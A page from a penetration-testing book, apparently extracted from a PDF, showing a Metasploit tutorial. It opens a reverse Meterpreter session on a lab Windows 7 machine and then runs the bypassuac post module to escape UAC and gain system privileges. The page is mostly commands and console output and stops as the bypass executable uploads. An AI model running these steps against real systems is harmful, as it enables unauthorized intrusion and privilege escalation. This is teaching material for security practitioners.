background image

Meterpreter Scripting

249

In this example, we use the post exploitation modules, which can be 

used to bypass UAC. We first start the 

multi/handler

 module with the 

-j

 flag, 

which allows us to accept multiple Meterpreter shells. Notice in this example 
that when we try to run the 

getsystem

 command, it fails because it is being 

blocked by Windows UAC.

resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:2310) at 

Thu June 09 08:02:45 -0500 2011

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > sysinfo
Computer: DAVE-DEV-PC
OS      : Windows 7 (Build 7600).
Arch    : x64 (Current Process is WOW64)
Language: en_US
meterpreter >

Notice that we can’t bridge over to a system-level account, because UAC 

is blocking us. We need to get around UAC to obtain system-level privileges 
and ultimately become an administrator so that we can further compromise 
the machine. We press 

CTRL

-Z to back out, keeping the session active. Then 

we use the new format to run post

 

modules and bypass the Windows UAC 

functionality.

msf exploit(handler) > 

use post/windows/escalate/bypassuac

msf post(bypassuac) > 

show options

Module options (post/windows/escalate/bypassuac):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     no        Listener IP address for the new session
   LPORT    4444             no        Listener port for the new session
   SESSION                   yes       The session to run this module on.

msf post(bypassuac) > 

set LHOST 172.16.32.128

LHOST => 172.16.32.128
msf post(bypassuac) > 

set SESSION 1

SESSION => 1
msf post(bypassuac) > 

exploit

[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler...
[*] Uploading the bypass UAC executable to the filesystem...